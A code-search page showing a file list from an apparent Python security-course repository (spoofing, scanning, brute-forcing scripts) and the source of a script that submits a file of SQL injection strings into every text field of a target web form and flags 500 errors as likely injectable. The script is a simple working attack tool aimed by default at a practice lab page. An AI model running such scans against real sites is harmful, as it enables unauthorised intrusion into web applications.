• Search by Module
• Search by Words
• Search Projects

• Java
• Python
• JavaScript
• TypeScript
• C++
• Scala
• Blog

• SPSE-master
  • pdb_example.py
  • arp_scan.py
  • requests_xforce_API.py
  • search_duckduckgo.py
  • monitor_directory.py
  • lock_threads.py
  • monitor_process.py
  • threads2.py
  • xmasScan_threaded.py
  • tcpServer_signals.py
  • viper_shadowserver_module.py
  • search_scrape_parse_threaded.py
  • viper_xforce_module.py
  • ftp_signals_login_brute.py
  • xor_file.py
  • gatherThreatIntel_ISC_IPs.py
  • base_HTTP_server1.py
  • monitor_wifi_probes.py
  • dir_recurser.py
  • mysql_example.py
  • forker.py
  • dns_spoof.py
  • arp_spoof.py
  • user_exceptions.py
  • shodanSearch.py
  • mechanize_webform_sqli.py
  • pe_imports.py
  • requests_shadowserver_API.py
  • ez_base64.py
  • simple_HTTP_server1.py
  • requests_malwr_API.py
  • requests_viper_API.py
  • tcpServer_SocketServer.py
  • threads1.py
  • mechanize_webform_inspect.py
  • tcpClient_signals.py
  • synScan_threaded.py
  • monitor_tcp_ports.py
  • dirbuster.py
  • README.md
  • pythagoras.py
  • naive_bayes_classifier.py
  • usb_logs.py
  • signals.py
  • ftp_command_fuzzer.py
  • alexa_10000_domains.txt
  • requests_freegeoip_API.py
  • mechanize_webform_brute.py
  • LICENSE.txt
  • selenium_webdriver.py
  • windows_WirelessAccessPoint.py
  • mechanize_scraper_threaded.py
  • ftp_explorer.py

#/bin/python
# http://attack.samsclass.info/sqlol/search.htm
import mechanize 
import logging
import time
from optparse import OptionParser
from urllib2 import HTTPError
import Queue
import threading

start = time.time()

def sqli(target, sqli_list):
  
  sqli_list = open(sqli_list)
  for sqli in sqli_list.readlines():
    sqli = sqli.rstrip()
    br = mechanize.Browser()
    br.set_handle_equiv(False)
    br.set_handle_redirect(False)
    br.set_handle_referer(False)
    br.set_handle_robots(False)
    br.open(target)
    br.select_form(nr=0)
    time.sleep(2)
    for field in br.form.controls:
      if field.type == "text":
        br.form[field.name] = str(sqli)
    print br.form#"! injecting {0}, in the form {1}, on the page: {2}".format(str(sqli), str(br.form.name), str(target))
    request = br.click(type="submit")
    response = br.open(request)
    if response.code == 200:
      print "No dice... 200 OK response"
    if response.code == 500:
      print "500 Internal Error, potential SQL with {0}".format(str(field))

	  
def main():
  # Setup the command line arguments.
  optp = OptionParser()

  # Output verbosity options
  optp.add_option('-q', '--quiet', help='set logging to ERROR',
                  action='store_const', dest='loglevel',
                  const=logging.ERROR, default=logging.INFO)
  optp.add_option('-d', '--debug', help='set logging to DEBUG',
                  action='store_const', dest='loglevel',
                  const=logging.DEBUG, default=logging.INFO)
  optp.add_option('-v', '--verbose', help='set logging to COMM',
                  action='store_const', dest='loglevel',
                  const=5, default=logging.INFO)

  # Option for target web form to brute
  optp.add_option("-t", "--target", dest="target",
                  help="The target page to attack")
				  
  # Option for sqli list to use in attack
  optp.add_option("-s", "--sqli", dest="sqli",
                  help="The list of SQL Injection attacks to use")
				  
  opts, args = optp.parse_args()

  if opts.target is None:
    opts.target = raw_input("What is the target page to attack w/ sqli: ")
	
  if opts.sqli is None:
    opts.sqli = raw_input("What is the SQL injection file to use in our attack: ")
	
  # Setup logging.
  logging.basicConfig(level=opts.loglevel,
                      format='%(levelname)-8s %(message)s')


  # Main Event Loop:
  try:
    sqli(opts.target, opts.sqli)
  
  except (KeyboardInterrupt, EOFError) as e:
    print "Exiting..."
    exit(0)
	
  print "Injection Complete!"
  print "Elapsed Time: %s" % (time.time() - start)
  
if __name__ == '__main__':
  main()